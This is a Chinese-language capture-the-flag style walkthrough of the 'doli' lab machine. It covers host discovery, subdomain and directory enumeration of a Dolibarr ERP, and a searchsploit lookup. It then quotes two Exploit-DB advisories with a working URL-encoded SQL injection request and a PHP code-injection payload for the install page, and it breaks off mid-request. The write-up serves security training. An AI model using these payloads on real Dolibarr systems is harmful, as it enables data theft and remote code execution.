靶机渗透练习105-doli: 1
靶机描述
靶机地址:https://www.vulnhub.com/entry/doli-1,727/
Description
Your boss told you to do a quick pentesting engagement on their new ERP/CRM Software that was recently setup and modded by junior developers . Can you find what mistakes did the developers made ?
This machine Is Based Of A Realistic Engagement When it comes to the web part
Difficulty : hard
一、搭建靶机环境
攻击机Kali:
IP地址:192.168.11.130
靶机:
IP地址:192.168.11.133
注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式)
该靶机环境搭建如下
- 将下载好的靶机环境,导入 VIrtualBox,设置为仅主机模式
- Kali设置为双网卡,网卡eth0设置为仅主机模式
- 本机上将两个网卡进行桥接
二、实战
2.1网络扫描
2.1.1 启动靶机和Kali后进行扫描
方法一、arp-scan -I eth1 -l (指定网卡扫)
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/105]
└─# arp-scan -I eth1 -l
Interface: eth1, type: EN10MB, MAC: 00:0c:29:46:e0:aa, IPv4: 192.168.10.148
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.10.2 00:50:56:f3:dc:0b VMware, Inc.
192.168.10.152 00:0c:29:a4:db:f7 VMware, Inc.
192.168.10.254 00:50:56:e3:e7:1f VMware, Inc.
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.981 seconds (129.23 hosts/sec). 3 responded
方法二、masscan 扫描的网段 -p 扫描端口号
masscan 192.168.11.0/24 -p 80,22
方法三、netdiscover -i 网卡-r 网段
netdiscover -i eth1 -r 192.168.11.0/24
方法四、fping -aqg 指定网段
fping -aqg 192.168.11.0/24
方法五、待补充
2.1.2 查看靶机开放的端口
使用nmap -A -sV -T4 -p- 靶机ip查看靶机开放的端口
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/105]
└─# nmap -A -sV -T4 -p- 192.168.10.152
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-05 15:53 CST
Nmap scan report for 192.168.10.152 (192.168.10.152)
Host is up (0.00042s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 08:01:98:54:d9:60:7a:38:26:85:f2:aa:96:b1:56:c5 (RSA)
| 256 c3:83:dd:93:bc:b6:c8:6d:f5:17:00:b3:50:c4:cb:08 (ECDSA)
|_ 256 72:ed:e9:d3:03:d6:3d:6a:ea:24:ad:07:07:cc:0f:79 (ED25519)
80/tcp open http nginx 1.10.3 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: nginx/1.10.3 (Ubuntu)
MAC Address: 00:0C:29:A4:DB:F7 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.42 ms 192.168.10.152 (192.168.10.152)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.38 seconds
目前看就开了个22和80端口
2.2 枚举漏洞
2.2.1 22端口分析
暂时没有好的字典
2.2.2 80端口分析
扫一下目录
2.2.2.1 目录扫描
常规文件扫描
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/105]
└─# gobuster dir -u http://192.168.10.152 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x txt,php,html,conf -e -k -r -q
http://192.168.10.152/index.html (Status: 200) [Size: 11321]
可执行文件扫描
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/105]
└─# gobuster dir -u http://192.168.10.152 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x js,aspx,cgi,sh,jsp -e -k -r -q
压缩包,备份扫描
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/105]
└─# gobuster dir -u http://192.168.10.152 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x rar,zip,7z,tar.gz,bak,txt,old,temp -e -k -r -q
换了字典换了其他目录扫描工具都扫不出来东西,感觉有点问题,去搜了一圈,发现了该靶机与https://tryhackme.com/room/doli这个是一个靶机,但是呢,tryhackme有一个提示,那就是给doli.thm加进hosts文件里
那就加一下再扫一下目录吧
常规文件扫描
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/105]
└─# gobuster dir -u http://doli.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x txt,php,html,conf -e -k -r -q
http://doli.thm/index.html (Status: 200) [Size: 11321]
还是一样的结果,感觉应该有子目录或者子域名
2.2.2.2 子域名爆破
试试扫一下子域名
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/105]
└─# gobuster vhost -u doli.thm -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t 30 -o sub.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://doli.thm
[+] Method: GET
[+] Threads: 30
[+] Wordlist: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
[+] Append Domain: false
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Progress: 4989 / 4990 (99.98%)
===============================================================
Finished
===============================================================
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/105]
└─# gobuster vhost -u doli.thm -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -t 30 -o sub.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://doli.thm
[+] Method: GET
[+] Threads: 30
[+] Wordlist: /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
[+] Append Domain: false
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Progress: 19966 / 19967 (99.99%)
===============================================================
Finished
===============================================================
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/105]
└─# gobuster vhost -u doli.thm -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 30 -o sub.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://doli.thm
[+] Method: GET
[+] Threads: 30
[+] Wordlist: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
[+] Append Domain: false
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Progress: 114441 / 114442 (100.00%)
===============================================================
Finished
===============================================================
换amass扫一下看看
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/105]
└─# amass enum -d doli.thm
No assets were discovered
The enumeration has finished
在尝试有一下用BurpSuite做子域名爆破
成功爆破出子域名为erp.doli.thm,奇怪,为啥gobuster扫不出来子域名,是我参数有问题吗?
回头又尝试了一遍dns枚举
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/105]
└─# gobuster dns -d doli.thm -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain: doli.thm
[+] Threads: 10
[+] Timeout: 1s
[+] Wordlist: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
===============================================================
Starting gobuster in DNS enumeration mode
===============================================================
Progress: 4989 / 4990 (99.98%)
===============================================================
Finished
===============================================================
DNS枚举得有DNS解析啊,DNS扫描估计得把erp.doli.thm写入hosts
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/105]
└─# gobuster dns -d doli.thm -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain: doli.thm
[+] Threads: 10
[+] Timeout: 1s
[+] Wordlist: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
===============================================================
Starting gobuster in DNS enumeration mode
===============================================================
Found: erp.doli.thm
Progress: 4989 / 4990 (99.98%)
===============================================================
Finished
===============================================================
果然,DNS枚举有结果了,不过vhost为啥就是扫不出来呢,真奇怪
访问一下:http://erp.doli.thm
目录扫描
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/105]
└─# gobuster dir -u http://erp.doli.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x txt,php,html,conf
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://erp.doli.thm
[+] Method: GET
[+] Threads: 64
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,conf,txt,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/contact (Status: 301) [Size: 194] [--> http://erp.doli.thm/contact/]
/support (Status: 301) [Size: 194] [--> http://erp.doli.thm/support/]
/security.txt (Status: 200) [Size: 162]
/user (Status: 301) [Size: 194] [--> http://erp.doli.thm/user/]
/product (Status: 301) [Size: 194] [--> http://erp.doli.thm/product/]
/public (Status: 301) [Size: 194] [--> http://erp.doli.thm/public/]
/admin (Status: 301) [Size: 194] [--> http://erp.doli.thm/admin/]
/categories (Status: 301) [Size: 194] [--> http://erp.doli.thm/categories/]
/ftp (Status: 301) [Size: 194] [--> http://erp.doli.thm/ftp/]
/includes (Status: 301) [Size: 194] [--> http://erp.doli.thm/includes/]
/core (Status: 301) [Size: 194] [--> http://erp.doli.thm/core/]
/install (Status: 301) [Size: 194] [--> http://erp.doli.thm/install/]
/document.php (Status: 200) [Size: 6961]
/custom (Status: 301) [Size: 194] [--> http://erp.doli.thm/custom/]
/resource (Status: 301) [Size: 194] [--> http://erp.doli.thm/resource/]
/api (Status: 301) [Size: 194] [--> http://erp.doli.thm/api/]
/holiday (Status: 301) [Size: 194] [--> http://erp.doli.thm/holiday/]
/website (Status: 301) [Size: 194] [--> http://erp.doli.thm/website/]
/paypal (Status: 301) [Size: 194] [--> http://erp.doli.thm/paypal/]
/theme (Status: 301) [Size: 194] [--> http://erp.doli.thm/theme/]
/conf (Status: 301) [Size: 194] [--> http://erp.doli.thm/conf/]
/robots.txt (Status: 200) [Size: 55]
/comm (Status: 301) [Size: 194] [--> http://erp.doli.thm/comm/]
/webservices (Status: 301) [Size: 194] [--> http://erp.doli.thm/webservices/]
/delivery (Status: 301) [Size: 194] [--> http://erp.doli.thm/delivery/]
/cron (Status: 301) [Size: 194] [--> http://erp.doli.thm/cron/]
/bookmarks (Status: 301) [Size: 194] [--> http://erp.doli.thm/bookmarks/]
/recruitment (Status: 301) [Size: 194] [--> http://erp.doli.thm/recruitment/]
/printing (Status: 301) [Size: 194] [--> http://erp.doli.thm/printing/]
/loan (Status: 301) [Size: 194] [--> http://erp.doli.thm/loan/]
/asterisk (Status: 301) [Size: 194] [--> http://erp.doli.thm/asterisk/]
/ticket (Status: 301) [Size: 194] [--> http://erp.doli.thm/ticket/]
/asset (Status: 301) [Size: 194] [--> http://erp.doli.thm/asset/]
/bom (Status: 301) [Size: 194] [--> http://erp.doli.thm/bom/]
/don (Status: 301) [Size: 194] [--> http://erp.doli.thm/don/]
/stripe (Status: 301) [Size: 194] [--> http://erp.doli.thm/stripe/]
/barcode (Status: 301) [Size: 194] [--> http://erp.doli.thm/barcode/]
/societe (Status: 301) [Size: 194] [--> http://erp.doli.thm/societe/]
/ecm (Status: 301) [Size: 194] [--> http://erp.doli.thm/ecm/]
/salaries (Status: 301) [Size: 194] [--> http://erp.doli.thm/salaries/]
/collab (Status: 301) [Size: 194] [--> http://erp.doli.thm/collab/]
/margin (Status: 301) [Size: 194] [--> http://erp.doli.thm/margin/]
/reception (Status: 301) [Size: 194] [--> http://erp.doli.thm/reception/]
/hrm (Status: 301) [Size: 194] [--> http://erp.doli.thm/hrm/]
/imports (Status: 301) [Size: 194] [--> http://erp.doli.thm/imports/]
/exports (Status: 301) [Size: 194] [--> http://erp.doli.thm/exports/]
/langs (Status: 301) [Size: 194] [--> http://erp.doli.thm/langs/]
/accountancy (Status: 301) [Size: 194] [--> http://erp.doli.thm/accountancy/]
/variants (Status: 301) [Size: 194] [--> http://erp.doli.thm/variants/]
/adherents (Status: 301) [Size: 194] [--> http://erp.doli.thm/adherents/]
/mrp (Status: 301) [Size: 194] [--> http://erp.doli.thm/mrp/]
/projet (Status: 301) [Size: 194] [--> http://erp.doli.thm/projet/]
/commande (Status: 301) [Size: 194] [--> http://erp.doli.thm/commande/]
/Stewie.php (Status: 200) [Size: 7017]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================
总算扫出来东西了,太感动了
依次访问状态200的页面
http://erp.doli.thm/robots.txt
User-agent: *
Allow: /index.php
#Allow: /$
Disallow: /
http://erp.doli.thm/security.txt
# Security policies of Stewie's Deadly Project
Contact: mailto:stewie@doli.thm
Preferred-Languages: en
Policy: No Policy
Expires: Sat, 31 Dec 2050 00:00:00 GMT
http://erp.doli.thm/document.php
http://erp.doli.thm/Stewie.php
查看document.php与Stewie.php源码发现,也不知道有没有用,先放着
点击页面click会跳转到http://erp.doli.thm/BrianDoIt
再扫一下其他的文件看看
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/105]
└─# gobuster dir -u http://erp.doli.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x md,txt,1st,rs
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://erp.doli.thm
[+] Method: GET
[+] Threads: 64
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: md,txt,1st,rs
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/contact (Status: 301) [Size: 194] [--> http://erp.doli.thm/contact/]
/support (Status: 301) [Size: 194] [--> http://erp.doli.thm/support/]
/security.txt (Status: 200) [Size: 162]
/user (Status: 301) [Size: 194] [--> http://erp.doli.thm/user/]
/product (Status: 301) [Size: 194] [--> http://erp.doli.thm/product/]
/public (Status: 301) [Size: 194] [--> http://erp.doli.thm/public/]
/admin (Status: 301) [Size: 194] [--> http://erp.doli.thm/admin/]
/categories (Status: 301) [Size: 194] [--> http://erp.doli.thm/categories/]
/ftp (Status: 301) [Size: 194] [--> http://erp.doli.thm/ftp/]
/includes (Status: 301) [Size: 194] [--> http://erp.doli.thm/includes/]
/core (Status: 301) [Size: 194] [--> http://erp.doli.thm/core/]
/install (Status: 301) [Size: 194] [--> http://erp.doli.thm/install/]
/custom (Status: 301) [Size: 194] [--> http://erp.doli.thm/custom/]
/resource (Status: 301) [Size: 194] [--> http://erp.doli.thm/resource/]
/api (Status: 301) [Size: 194] [--> http://erp.doli.thm/api/]
/holiday (Status: 301) [Size: 194] [--> http://erp.doli.thm/holiday/]
/notes.md (Status: 200) [Size: 310]
/website (Status: 301) [Size: 194] [--> http://erp.doli.thm/website/]
/theme (Status: 301) [Size: 194] [--> http://erp.doli.thm/theme/]
/paypal (Status: 301) [Size: 194] [--> http://erp.doli.thm/paypal/]
/conf (Status: 301) [Size: 194] [--> http://erp.doli.thm/conf/]
/robots.txt (Status: 200) [Size: 55]
/comm (Status: 301) [Size: 194] [--> http://erp.doli.thm/comm/]
/webservices (Status: 301) [Size: 194] [--> http://erp.doli.thm/webservices/]
/delivery (Status: 301) [Size: 194] [--> http://erp.doli.thm/delivery/]
/cron (Status: 301) [Size: 194] [--> http://erp.doli.thm/cron/]
/bookmarks (Status: 301) [Size: 194] [--> http://erp.doli.thm/bookmarks/]
/recruitment (Status: 301) [Size: 194] [--> http://erp.doli.thm/recruitment/]
/printing (Status: 301) [Size: 194] [--> http://erp.doli.thm/printing/]
/loan (Status: 301) [Size: 194] [--> http://erp.doli.thm/loan/]
/asterisk (Status: 301) [Size: 194] [--> http://erp.doli.thm/asterisk/]
/ticket (Status: 301) [Size: 194] [--> http://erp.doli.thm/ticket/]
/asset (Status: 301) [Size: 194] [--> http://erp.doli.thm/asset/]
/bom (Status: 301) [Size: 194] [--> http://erp.doli.thm/bom/]
/don (Status: 301) [Size: 194] [--> http://erp.doli.thm/don/]
/stripe (Status: 301) [Size: 194] [--> http://erp.doli.thm/stripe/]
/barcode (Status: 301) [Size: 194] [--> http://erp.doli.thm/barcode/]
/societe (Status: 301) [Size: 194] [--> http://erp.doli.thm/societe/]
/ecm (Status: 301) [Size: 194] [--> http://erp.doli.thm/ecm/]
/salaries (Status: 301) [Size: 194] [--> http://erp.doli.thm/salaries/]
/collab (Status: 301) [Size: 194] [--> http://erp.doli.thm/collab/]
/margin (Status: 301) [Size: 194] [--> http://erp.doli.thm/margin/]
/reception (Status: 301) [Size: 194] [--> http://erp.doli.thm/reception/]
/hrm (Status: 301) [Size: 194] [--> http://erp.doli.thm/hrm/]
/imports (Status: 301) [Size: 194] [--> http://erp.doli.thm/imports/]
/exports (Status: 301) [Size: 194] [--> http://erp.doli.thm/exports/]
/langs (Status: 301) [Size: 194] [--> http://erp.doli.thm/langs/]
/accountancy (Status: 301) [Size: 194] [--> http://erp.doli.thm/accountancy/]
/variants (Status: 301) [Size: 194] [--> http://erp.doli.thm/variants/]
/adherents (Status: 301) [Size: 194] [--> http://erp.doli.thm/adherents/]
/mrp (Status: 301) [Size: 194] [--> http://erp.doli.thm/mrp/]
/projet (Status: 301) [Size: 194] [--> http://erp.doli.thm/projet/]
/commande (Status: 301) [Size: 194] [--> http://erp.doli.thm/commande/]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================
打开http://erp.doli.thm/notes.md
# ChangeLog
- Changed The Super-Admin Password To A Super Secure Random 15 Chars Passwd (Done)
- Crypt Saved Passwords Locally
- Add Firewall Rules And Allow Only UDP Incoming-Outcoming At Port 9110
- Add a lockfile (To do)
- Revert The Framework's Patch From 7.0.X To Prevent Conflitions With The Mod (To do)
这里看不出什么CMS,但是好像提示了框架的版本是7.0.X,用whatweb扫一下
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/105]
└─# whatweb http://erp.doli.thm/document.php
http://erp.doli.thm/document.php [200 OK] Cookies[DOLSESSID_04691a863e61e14f914604be02d8ef51], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][nginx/1.10.3 (Ubuntu)], HttpOnly[DOLSESSID_04691a863e61e14f914604be02d8ef51], IP[192.168.10.152], JQuery, Meta-Author[Stewie Development Team], PasswordField[password], Script, Title[Login @ 13.0.1], UncommonHeaders[x-content-type-options], X-Frame-Options[SAMEORIGIN], nginx[1.10.3]
根据靶机提示ERP/CRM与靶机名doli聚合搜索一下看
该靶机大概就是Dolibarr的框架了,直接kali本地漏洞库搜一下dolibarr
┌──(root㉿MYsec)-[~hirak0/Vulhub/105]
└─# searchsploit dolibarr
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Dolibarr 11.0.3 - Persistent Cross-Site Scripting | php/webapps/48504.txt
Dolibarr 12.0.3 - SQLi to RCE | php/webapps/49240.py
Dolibarr ERP 11.0.4 - File Upload Restrictions Bypass (Authenticated RCE) | php/webapps/49711.py
Dolibarr ERP 14.0.1 - Privilege Escalation | php/webapps/50248.txt
Dolibarr ERP-CRM 10.0.1 - 'elemid' SQL Injection | php/webapps/47362.txt
Dolibarr ERP-CRM 10.0.1 - 'User-Agent' Cross-Site Scripting | php/webapps/47384.txt
Dolibarr ERP-CRM 10.0.1 - SQL Injection | php/webapps/47370.txt
Dolibarr ERP-CRM 12.0.3 - Remote Code Execution (Authenticated) | php/webapps/49269.py
Dolibarr ERP-CRM 14.0.2 - Stored Cross-Site Scripting (XSS) / Privilege Escalation | php/webapps/50432.txt
Dolibarr ERP-CRM 8.0.4 - 'rowid' SQL Injection | php/webapps/46095.txt
Dolibarr ERP/CRM 3 - (Authenticated) OS Command Injection (Metasploit) | php/webapps/18724.rb
Dolibarr ERP/CRM 3.0 - Local File Inclusion / Cross-Site Scripting | php/webapps/35651.txt
Dolibarr ERP/CRM 3.0.0 - Multiple Vulnerabilities | php/webapps/17202.txt
Dolibarr ERP/CRM 3.1 - Multiple Script URI Cross-Site Scripting Vulnerabilities | php/webapps/36330.txt
Dolibarr ERP/CRM 3.1.0 - '/admin/boxes.php?rowid' SQL Injection | php/webapps/36333.txt
Dolibarr ERP/CRM 3.1.0 - '/user/index.php' Multiple SQL Injections | php/webapps/36331.txt
Dolibarr ERP/CRM 3.1.0 - '/user/info.php?id' SQL Injection | php/webapps/36332.txt
Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities | php/webapps/36873.txt
Dolibarr ERP/CRM 3.2.0 < Alpha - File Inclusion | php/webapps/18480.txt
Dolibarr ERP/CRM 3.4.0 - 'exportcsv.php?sondage' SQL Injection | php/webapps/28971.py
Dolibarr ERP/CRM 3.5.3 - Multiple Vulnerabilities | php/webapps/34007.txt
Dolibarr ERP/CRM 3.x - '/adherents/fiche.php' SQL Injection | php/webapps/36683.txt
Dolibarr ERP/CRM 7.0.0 - (Authenticated) SQL Injection | php/webapps/44805.txt
Dolibarr ERP/CRM 8.0.3 - Cross-Site Scripting | php/webapps/45945.txt
Dolibarr ERP/CRM < 3.2.0 / < 3.1.1 - OS Command Injection | php/webapps/18725.txt
Dolibarr ERP/CRM < 7.0.3 - PHP Code Injection | php/webapps/44964.txt
Dolibarr Version 17.0.1 - Stored XSS | php/webapps/51683.txt
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
发现有不少漏洞啊,根据note.md的提示,版本是7.0.x
其中符合的漏洞有
Dolibarr ERP/CRM 7.0.0 - (Authenticated) SQL Injection | php/webapps/44805.txt
Dolibarr ERP/CRM < 7.0.3 - PHP Code Injection | php/webapps/44964.txt
看一下这两个漏洞的说明文件
┌──(root㉿MYsec)-[~hirak0/Vulhub/105]
└─# cat /usr/share/exploitdb/exploits/php/webapps/44805.txt
# [CVE-2018-10094] Dolibarr SQL Injection vulnerability
## Description
Dolibarr is an "Open Source ERP & CRM for Business" used by many
companies worldwide.
It is available through [GitHub](https://github.com/Dolibarr/dolibarr)
or as distribution packages (e.g .deb package).
**Threat**
The application does not handle user input properly and allows execution
of arbitrary SQL commands on the database.
**Expectation**
Prepared queries should be used in order to avoid SQL injection in user
input.
## Vulnerability type
**CVE ID**: CVE-2018-10094
**Access Vector**: remote
**Security Risk**: high
**Vulnerability**: CWE-89
**CVSS Base Score**: 7.5
**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
## Details
The database connector escapes quotes with the `real_escape_string()`
wrapper. However it is still possible to perform injection on integer
parameters without quotes.
```php
mysqli.class.php
/**
* Escape a string to insert data
*
* @param string $stringtoencode String to escape
* @return string String escaped
*/
function escape($stringtoencode)
{
return $this->db->real_escape_string($stringtoencode);
}
```
Additional checks are defined later, which forbit some SQL keywords (e.g
`union`, `create`, `insert`). However, by url encoding the payload,
these checks are bypassed.
```php
main.inc.php
/**
* Security: SQL Injection and XSS Injection (scripts) protection
(Filters on GET, POST, PHP_SELF).
*
* @param string $val Value
* @param string $type 1=GET, 0=POST, 2=PHP_SELF
* @return int >0 if there is an injection
*/
function test_sql_and_script_inject($val, $type)
{
$inj = 0;
// For SQL Injection (only GET are used to be included into bad
escaped SQL requests)
if ($type == 1)
{
$inj += preg_match('/updatexml\(/i', $val);
$inj += preg_match('/delete\s+from/i', $val);
$inj += preg_match('/create\s+table/i', $val);
$inj += preg_match('/insert\s+into/i', $val);
$inj += preg_match('/select\s+from/i', $val);
$inj += preg_match('/into\s+(outfile|dumpfile)/i', $val);
}
if ($type != 2) // Not common, we can check on POST
{
$inj += preg_match('/update.+set.+=/i', $val);
$inj += preg_match('/union.+select/i', $val);
$inj += preg_match('/(\.\.%2f)+/i', $val);
}
// For XSS Injection done by adding javascript with script
// This is all cases a browser consider text is javascript:
// When it found '<script', 'javascript:', '<style', 'onload\s=' on
body tag, '="&' on a tag size with old browsers
// All examples on page: http://ha.ckers.org/xss.html#XSScalc
// More on
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
$inj += preg_match('/<script/i', $val);
$inj += preg_match('/<iframe/i', $val);
$inj += preg_match('/Set\.constructor/i', $val); // ECMA script 6
if (! defined('NOSTYLECHECK')) $inj += preg_match('/<style/i', $val);
$inj += preg_match('/base[\s]+href/si', $val);
$inj += preg_match('/<.*onmouse/si', $val); // onmousexxx can
be set on img or any html tag like <img title='...' onmouseover=alert(1)>
$inj += preg_match('/onerror\s*=/i', $val); // onerror can be
set on img or any html tag like <img title='...' onerror = alert(1)>
$inj += preg_match('/onfocus\s*=/i', $val); // onfocus can be
set on input text html tag like <input type='text' value='...' onfocus =
alert(1)>
$inj += preg_match('/onload\s*=/i', $val); // onload can be
set on svg tag <svg/onload=alert(1)> or other tag like body <body
onload=alert(1)>
$inj += preg_match('/onclick\s*=/i', $val); // onclick can be
set on img text html tag like <img onclick = alert(1)>
$inj += preg_match('/onscroll\s*=/i', $val); // onscroll can be
on textarea
//$inj += preg_match('/on[A-Z][a-z]+\*=/', $val); // To lock event
handlers onAbort(), ...
$inj += preg_match('/:|:|:/i', $val); //
refused string ':' encoded (no reason to have it encoded) to lock
'javascript:...'
//if ($type == 1)
//{
$inj += preg_match('/javascript:/i', $val);
$inj += preg_match('/vbscript:/i', $val);
//}
// For XSS Injection done by adding javascript closing html tags
like with onmousemove, etc... (closing a src or href tag with not
cleaned param)
if ($type == 1) $inj += preg_match('/"/i', $val); // We
refused " in GET parameters value
if ($type == 2) $inj += preg_match('/[;"]/', $val); // PHP_SELF
is a file system path. It can contains spaces.
return $inj;
}
```
## Proof of Concept : retrieving the database name.
Payload:
```
1) union select
0,1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
Url-encoded payload:
%31%29%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%30%2c%31%2c%32%2c%76%65%72%73%69%6f%6e%28%29%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%23
```
```http
GET
/dolibarr/adherents/list.php?leftmenu=members&statut=%31%29%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%30%2c%31%2c%32%2c%76%65%72%73%69%6f%6e%28%29%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%23
HTTP/1.1
Host: dolibarr.lab:2080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie:
DOLSESSID_cac4a1e49e4040e845340fe919bd202b=qh3ot46kvm95ph0ddd3ujd7je5
Connection: close
Upgrade-Insecure-Requests: 1
...
</a>
</td>
<td>10.1.26-MariaDB-0+deb9u1</td>
<td>2</td>
<td></td>
<td>1</td>
<td>21</td>
<td class="nowrap">
```
## Affected versions
* Version 7.0.0 (last stable version as of March 2018) - previous
versions are probably also vulnerable but not tested
## Solution
Update to 7.0.2
([changelog](https://raw.githubusercontent.com/Dolibarr/dolibarr/develop/ChangeLog))
## Timeline (dd/mm/yyyy)
* 18/03/2018 : Initial discovery
* 17/04/2018 : Contact with the editor
* 17/04/2018 : Editor acknowledges the vulnerability
* 18/04/2018 : Editor announces fixes in version 7.0.2
* 21/05/2018 : Vulnerability disclosure
## Credits
* Issam RABHI (i dot rabhi at sysdream dot com)
* Kevin LOCATI (k dot locati at sysdream dot com)
-- SYSDREAM Labs <labs@sysdream.com> GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 * Website: https://sysdream.com/ * Twitter: @sysdream
┌──(root㉿MYsec)-[~hirak0/Vulhub/105]
└─# cat /usr/share/exploitdb/exploits/php/webapps/44964.txt
# Exploit Title: Unauthenticated Remote Code Evaluation in Dolibarr ERP CRM =<7.0.3
# Date: 06/29/2018
# Exploit Author: om3rcitak - https://omercitak.com
# Vendor Homepage: https://dolibarr.org
# Software Link: https://github.com/Dolibarr/dolibarr
# Version: =<7.0.3
# Tested on: Unix, Windows
## Technical Details
URL: http://{domain}/{dolibarr_path}/install/step1.php
Parameter Name: db_name
Parameter Type: POST
Attack Pattern: x\';system($_GET[cmd]);//
## Steps to reproduce the behavior
- Go to fresh install page.
- Click "Next Step" button for create example config file (conf/conf.php)
- Send this request:
```
POST {dolibarr_path}/install/step1.php HTTP/1.1
Host: {domain}
